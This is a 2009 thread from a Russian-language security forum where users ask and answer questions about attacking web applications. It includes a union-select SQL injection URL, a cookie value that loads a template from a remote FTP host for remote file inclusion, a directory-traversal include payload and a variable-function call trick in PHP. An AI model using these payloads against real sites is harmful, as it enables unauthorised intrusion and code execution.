HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9421  
Старый 17.10.2009, 13:10
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от Byrger  
Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?
нет
 
Ответить с цитированием

  #9422  
Старый 17.10.2009, 15:59
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
 
Ответить с цитированием

  #9423  
Старый 17.10.2009, 16:09
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

Цитата:
Сообщение от Byrger  
Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
https://forum.antichat.ru/thread93318.html
 
Ответить с цитированием

  #9424  
Старый 17.10.2009, 16:21
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include(
$_COOKIE['skin'].'/template.php'); 
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.

Последний раз редактировалось mailbrush; 17.10.2009 в 16:26..
 
Ответить с цитированием

  #9425  
Старый 17.10.2009, 16:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Rezak  
Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
PHP код:
<? $a($b); ?>
он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.

P.S. Это к сообщению про вот этот скрипт
PHP код:
<?
$template
->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Это можно замутить если тока register_globals = on
в php.ini
 
Ответить с цитированием

  #9426  
Старый 17.10.2009, 16:58
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от mailbrush  
Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include(
$_COOKIE['skin'].'/template.php'); 
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
Там RFI
Cookie: skin=ftp://vasya:tapochkin@ftp.narod.ru/

ну а на фтпшнике соответственно файл template.php
+ "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
==
Если интересует именно LFI произвольного файла, то врятли

Последний раз редактировалось jokester; 17.10.2009 в 17:12..
 
Ответить с цитированием

  #9427  
Старый 17.10.2009, 17:03
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Ctacok  
Это можно замутить если тока register_globals = on
в php.ini
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #9428  
Старый 17.10.2009, 17:18
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Qwazar  
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
 
Ответить с цитированием

  #9429  
Старый 17.10.2009, 17:34
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ctacok  
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
Не будет работать, ибо глобальные массивы будут регистрироваться вначале скрипта, а после будет идти инклюд конфига какого-то, и $template заменится.

jokester, спасибо. Это мой код, т.е. исходников я палить не хотел, ибо там названия классов / ф-ция выдает двиг. В исходнике движка есть еще префикс dirname(__FILE__), т.е. папка тек. файла. Значит никак Спасибо еще раз... Значит можно добиться только расскрытия...

Последний раз редактировалось mailbrush; 17.10.2009 в 18:06..
 
Ответить с цитированием

  #9430  
Старый 17.10.2009, 17:46
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
9419

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ctacok  
PHP код:
file.php?template=../index.php%0D 
Ну а я вообщем то говорил про первый пример, так что строго не судите
С первым то все понятно, работает как часы

А вот этот скрипт он именно такой короткий и есть
PHP код:
$template->set_filenames(array('head'=>"$template_path/header.html")); 
Просто он написан для того чтобы его инклудить в файл в котором класс template задан уже, но по глупости авторов к этому скрипту есть прямой доступ.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ